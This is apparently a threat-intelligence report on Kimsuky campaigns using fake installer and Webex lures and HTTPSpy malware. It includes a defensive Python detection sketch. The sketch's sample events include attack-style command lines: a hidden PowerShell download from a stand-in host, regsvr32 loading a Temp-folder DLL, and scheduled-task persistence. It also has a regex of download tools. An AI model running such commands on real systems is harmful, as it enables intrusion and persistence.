North Korean group Kimsuky targeted South Korean military and corporate entities in March and April 2026, using fake security software pages, counterfeit Webex lures and a renewed HTTPSpy malware variant to deliver intrusion chains that included downloader scripts, persistence and remote access.
KEY FACTS
- Targets: South Korean military and corporate organizations, with some activity aimed at messaging administrators.
- Lures: Fake installer pages and a counterfeit Webex meeting page tied to a real schedule.
- Payloads: A new HTTPSpy variant, plus downloader chains that led to other malware.
- Techniques: JSONPing checks, scheduled tasks, PowerShell downloaders and VS Code tunneling.
A technical analysis by ENKI said the March campaign used a bogus page impersonating a South Korean B2B messaging service to offer security tools. The download led to executables that disguised themselves as nProtect Online Security and AhnLab Safe Transaction, but both launched the same malicious behavior.
The binaries ran a second-stage DLL through regsvr32.exe, deleted themselves, then set persistence with a scheduled task and contacted a command and control server. ENKI said the attacker likely watched repeated GET requests and selectively sent additional payloads to chosen victims.
In an April campaign, a fake Webex page told victims to run a script to fix camera access. That path led to a ZIP archive with an encrypted JSE file, then to a downloader that fetched more malware before the final DLL deployed HTTPSpy on the compromised system.
HTTPSpy can run shell commands, upload and download files, capture screenshots, inject DLL paths into processes and erase itself from the endpoint. The disclosure also said Kimsuky used JSONPing to check whether malware was running and to show an installation prompt if it was not.
Separately, Kaspersky said the group has also used VS Code tunneling, Cloudflare Quick Tunnels, DWAgent and Rust-based malware in recent campaigns, with activity spanning defense, military, government, medical, machinery and energy sectors. The report said the actor still appears to have access to original source code and can modify it.
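The tradecraft listed in the key facts (regsvr32.exe loading a second-stage DLL, scheduled-task persistence, PowerShell downloaders, VS Code tunneling) is observable in process-creation telemetry. The following is an added detection sketch, not code from ENKI, Kaspersky or this report: it classifies Sysmon-style process-creation events (the `Image` and `CommandLine` fields) against those four behaviours and then correlates per host, raising an alert only when two or more distinct techniques appear within a short window. The sample events, hostnames, paths and timestamps are constructed for illustration and are not indicators from the campaign; the path and command-line patterns are generic heuristics, not campaign-specific signatures.

```python
"""
Added detection sketch (not the report's or vendors' code) for the chain
described above: regsvr32.exe loading a DLL from a user-writable path,
schtasks persistence pointing at a user-writable path, PowerShell download
cradles, and a VS Code tunnel launch. Events mimic Sysmon Event ID 1
(process creation) field names; all sample data below is constructed.
"""
import re
from typing import Dict, List, Tuple

# Heuristic: DLL/binary lives somewhere an unprivileged user can write.
USER_WRITABLE = re.compile(
    r"(?i)\\(users\\[^\\]+\\(appdata|downloads|desktop)|programdata|windows\\temp|temp)\\"
)
# Heuristic: common PowerShell download primitives.
DOWNLOAD_CRADLE = re.compile(
    r"(?i)(invoke-webrequest|\biwr\b|downloadstring|downloadfile|start-bitstransfer|\bcurl\b|\bwget\b)"
)


def classify(event: Dict[str, str]) -> List[str]:
    """Return the technique labels a single process-creation event matches."""
    image = event.get("Image", "")
    name = image.rsplit("\\", 1)[-1].lower()
    cmd = event.get("CommandLine", "")
    cmd_l = cmd.lower()
    findings: List[str] = []
    if name == "regsvr32.exe" and USER_WRITABLE.search(cmd):
        findings.append("regsvr32_user_path_dll")
    if name == "schtasks.exe" and "/create" in cmd_l and USER_WRITABLE.search(cmd):
        findings.append("schtasks_persist_user_path")
    if name in ("powershell.exe", "pwsh.exe") and DOWNLOAD_CRADLE.search(cmd):
        findings.append("powershell_download_cradle")
    if name == "code.exe" and re.search(r"\btunnel\b", cmd_l):
        findings.append("vscode_tunnel")
    return findings


def correlate(events: List[Dict], window: int = 900) -> Dict[str, List[str]]:
    """Per host, alert when >= 2 distinct techniques occur within `window` seconds.

    A single regsvr32 or schtasks call is noisy on its own; the chain is the signal.
    """
    by_host: Dict[str, List[Tuple[int, str]]] = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        for label in classify(ev):
            by_host.setdefault(ev["host"], []).append((ev["ts"], label))
    alerts: Dict[str, List[str]] = {}
    for host, hits in by_host.items():
        for t0, _ in hits:
            kinds = {label for t, label in hits if t0 <= t <= t0 + window}
            if len(kinds) >= 2:
                alerts[host] = sorted(kinds)
                break
    return alerts


# Constructed sample events (hypothetical hosts, users, paths and times).
SAMPLE_EVENTS = [
    {"host": "WS01", "ts": 1000, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Users\alice\AppData\Local\Temp\update.dll"},
    {"host": "WS01", "ts": 1030, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /create /sc minute /mo 10 /tn "Updater" '
                    r'/tr "C:\Users\alice\AppData\Local\Temp\svc.exe"'},
    {"host": "WS01", "ts": 1100,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -w hidden -c "Invoke-WebRequest '
                    r'https://example.invalid/s -OutFile $env:TEMP\s.zip"'},
    {"host": "WS02", "ts": 2000, "Image": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "CommandLine": r'"C:\Program Files\Microsoft VS Code\Code.exe" tunnel'},
    # Benign control: regsvr32 registering a DLL under Program Files is not flagged.
    {"host": "WS03", "ts": 3000, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Program Files\Vendor\legit.dll"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["host"], ev["ts"], classify(ev))
    print("alerts:", correlate(SAMPLE_EVENTS))
```

In this sketch WS01 trips the correlation (three techniques inside fifteen minutes), WS02 shows a lone VS Code tunnel launch that is worth a lower-severity notice rather than an alert, and WS03's regsvr32 call under Program Files stays silent. In production the path heuristics would be tuned to the environment's software deployment paths, and tunnel launches would be compared against an allow-list of approved remote-development users.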
WHY IT MATTERS
The campaigns show a mix of social engineering and living-off-the-land techniques that can make detection harder and allow tailored delivery of malware to selected victims. They also point to continued evolution in a long-running North Korean intrusion set focused on South Korea and spanning multiple sectors.